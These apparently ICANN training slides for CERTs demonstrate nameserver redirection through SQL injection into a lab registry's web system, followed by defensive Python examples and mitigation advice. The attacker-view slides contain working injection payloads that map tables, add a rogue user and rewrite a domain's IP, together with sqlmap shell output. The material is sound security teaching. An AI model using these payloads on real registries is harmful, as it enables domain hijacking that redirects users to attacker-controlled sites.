Presentation by ICANN
DNS Security for CERTs - Attack Scenarios & Demonstrations: NameServer Redirection
Chris Evans, Delta Risk, LLC
7 March 2010
What You Will Need for the Exercise
• Please Watch the Live Demonstration in Front
– We will be targeting the web registry system
• You may need your Ubuntu VM to:
– Prior to attack, verify the Web Registry System URL: http://www.tld1 points to 192.168.101.50
– After attack, determine where http://www.tld1 points to
Description – NameServer Redirection
• Change of Registration or Delegation Data
– Intentional
• Disgruntled employee changes registry data
• Outsiders pretending to be a customer request an “update” to their account
• Hackers change the registry database directly through web attacks
– Accidental
• Untrained employee
• Typos in registry data
Domain1 NS 1.1.1.1
Domain2 NS 2.2.2.2
Domain3 NS 3.3.3.3 -> 5.5.5.5
Attacker now controls resolutions for Domain3
Case Study
• SQL Injection Top List of Data Breach Attacks
– SQL Injection used in 60% of all data breach attacks, 19% of all security breaches on the Internet (DarkReading.com)
– Insecure programming techniques combined with proliferation of web based application = trouble
– Increase in automated techniques to detect and exploit vulnerabilities = double trouble
Case Study
• Summer of 2009, several African & Pacific ccTLD web-based registry systems were attacked through SQL injection
– Attackers created new user accounts within the system
– These accounts were used to modify existing registrations and re-delegate sites to malicious content
http://www.icann.org/en/security/sa-2009-0001.htm
Attack Demonstration
Your website is designed to perform a query during a valid login attempt:
SELECT * FROM table WHERE username='mike' AND password='!QAZ2wsx'
SQL Injection …. Well…. Injects SQL statements into your backend database query:
SELECT * FROM table WHERE username='mike'; INSERT hacker INTO database --
New SQL statement injected…. …original SQL statement gets commented out “--”
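The login query above, as an added example that is not part of the slides: the same lookup written the vulnerable way (input spliced into the SQL text) and the hardened way (fixed SQL text with bound parameters). The table name srs_users is taken from the demonstration; the schema and the use of SQLite are assumptions for illustration.

```python
import sqlite3

# Constructed stand-in for the registry's user table (table name from the slides,
# columns assumed). Passwords are kept in clear text only to mirror the slide's
# query; a real system would store a salted hash.
def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE srs_users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO srs_users VALUES (1, 'mike', '!QAZ2wsx')")
    conn.commit()
    return conn

def build_query_unsafe(username, password):
    """The pattern from the slide: user input spliced straight into the SQL text."""
    return ("SELECT * FROM srs_users WHERE username='" + username
            + "' AND password='" + password + "'")

def login_unsafe(conn, username, password):
    """Vulnerable login. A single quote in the input changes the statement's
    structure; the database error is handed back to the caller, which is the
    information leak the slides use for reconnaissance."""
    try:
        return conn.execute(build_query_unsafe(username, password)).fetchone()
    except sqlite3.Error as exc:
        return ("db-error", str(exc))

def login_safe(conn, username, password):
    """Hardened login: the SQL text never changes and the driver binds the
    values, so a quote or a '--' in the input is only ever compared as data."""
    return conn.execute(
        "SELECT * FROM srs_users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()

if __name__ == "__main__":
    db = setup_db()
    print(login_unsafe(db, "mike", "!QAZ2wsx"))  # legitimate login works either way
    print(login_unsafe(db, "mike'", "x"))        # ('db-error', ...): one quote broke the query
    print(login_safe(db, "mike'", "x"))          # None: the quote is just an unknown username
```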
Demonstration – Attacker View
Reconnaissance & Table Mapping... One single ' nets table name and two variables:
' group by srs_users.username having 1=1--
Adds user hacker to the database…….
';insert into srs_users values(101,'hacker','password')--
Use SQL Injection tool to gain a shell to the database <SQL-map>:
sql-shell> select * from srs_regs where fqdn='rogue.tld1'
do you want to retrieve the SQL statement output? [Y/n] y
[15:15:56] [INFO] fetching SQL SELECT statement query output: 'select * from srs_regs where fqdn='rogue.tld1''
[15:15:56] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[15:15:56] [WARNING] on PostgreSQL it is only possible to enumerate on the current schema and on system databases, sqlmap is going to use 'public' schema as database name
[15:15:56] [INFO] fetching columns for table 'srs_regs' on database 'public'
[15:15:56] [INFO] fetching number of columns for table 'srs_regs' on database 'public'
[15:15:56] [INFO] retrieved: 9
[15:15:57] [INFO] retrieved: regid
[15:15:59] [INFO] retrieved: type
[15:16:01] [INFO] retrieved: fqdn
[15:16:03] [INFO] retrieved: ns
[15:16:04] [INFO] retrieved: ip
[15:16:06] [INFO] retrieved: recordtype
[15:16:10] [INFO] retrieved: hostname
[15:16:14] [INFO] retrieved: ownerid
[15:16:17] [INFO] retrieved: parentid
Demonstration – Attacker View (cont.)
Enumerating the Database… …then update a record with bad IP…
'; update srs_regs set (ip)=('192.168.85.5') where regid = 1 --
Demonstration – Server View
; <<>> DiG 9.5.1-P2 <<>> www.tld1
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23392
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;www.tld1. IN A
;; ANSWER SECTION:
www.tld1. 180 IN A 192.168.101.50
;; AUTHORITY SECTION:
Demonstration – User View
1. One minute you get the correct IP and website…
2. …the next you’re browsing whatever the hacker wants you to!
; <<>> DiG 9.5.1-P2 <<>> www.tld1
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23392
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;www.tld1. IN A
;; ANSWER SECTION:
www.tld1. 180 IN A 192.168.85.5
;; AUTHORITY SECTION:
Impact
• Registry suffers public relations hit, potential loss of customers & revenue
• Loss of brand reputation, customers, or revenue for registrants who are victimized
• Effect of attack persists even after detection and mitigation because of TTLs
Mitigation & Response Strategies
• SQL Injection
– Practice secure coding principles in any web-based application that has database connectivity
– Validate input and prevent “magic characters”
– Use a Web Application Firewall to filter/validate the input to your web application
– Use database logging to track queries and the pages they are being run on.
– Frequently audit your web applications (not just the systems they run on!)
Mitigation & Response Strategies
• Nameserver Redirection
– Multi-factor authentication of changes
– Out-of-band check of changes (e.g. phone, in-person)
– Domain “locks” which prevent updates unless manually approved
– Validation of changes before publishing new zone files
– Processes for contacting ISPs to “clear” cached entries
– Automated, continuous validation of published data with automated alerting
– Also see ICANN SSAC Report SAC040
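The “automated, continuous validation of published data with automated alerting” item, as an added example that is not part of the slides: a check that parses dig output for the A records actually being served and compares them with the registry’s intended data, reporting the TTL so responders know how long a bad answer can linger in caches. The expected-record table and the two dig transcripts are constructed from the addresses used in the exercise.

```python
import re

# The registry's intended data, i.e. the change-controlled source of truth
# (constructed, matching the registration shown in the exercise).
EXPECTED_A = {"www.tld1.": "192.168.101.50"}

# Constructed dig transcripts modelled on the two answers shown in the demonstration.
DIG_BEFORE = """\
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23392
;; QUESTION SECTION:
;www.tld1.                      IN      A
;; ANSWER SECTION:
www.tld1.               180     IN      A       192.168.101.50
;; AUTHORITY SECTION:
"""
DIG_AFTER = DIG_BEFORE.replace("192.168.101.50", "192.168.85.5")

ANSWER_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+A\s+(\d{1,3}(?:\.\d{1,3}){3})$")

def parse_dig_answers(dig_output):
    """Return (name, ttl, ip) for each A record in dig's ANSWER SECTION."""
    answers, in_answer = [], False
    for raw in dig_output.splitlines():
        line = raw.strip()
        if line.startswith(";; ANSWER SECTION:"):
            in_answer = True
            continue
        if line.startswith(";"):          # any other section header or comment
            in_answer = False
            continue
        m = ANSWER_RE.match(line) if in_answer else None
        if m:
            answers.append((m.group(1), int(m.group(2)), m.group(3)))
    return answers

def check_published(dig_output, expected=EXPECTED_A):
    """Compare what resolvers actually see with the registry's intended data.
    Returns one alert string per discrepancy; an empty list means all clear."""
    alerts = []
    for name, ttl, ip in parse_dig_answers(dig_output):
        want = expected.get(name)
        if want is None:
            alerts.append(f"ALERT {name}: record {ip} not present in registry data")
        elif ip != want:
            # The TTL bounds how long the bad answer survives in resolver caches
            # after the registry record itself has been corrected.
            alerts.append(f"ALERT {name}: published A {ip}, registry says {want}; "
                          f"cached answers may persist up to {ttl}s")
    return alerts
```

Running `check_published(DIG_AFTER)` yields a single alert for www.tld1. pointing at 192.168.85.5 with a 180s cache window; `check_published(DIG_BEFORE)` returns an empty list.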
Mitigation & Response Strategies
• Information Sharing – if you’re the victim of an attack – share the details of the attack within the community – you may prevent someone else from becoming a victim
As trusted entities, CERTs can encourage this type of exchange within their communities
Questions?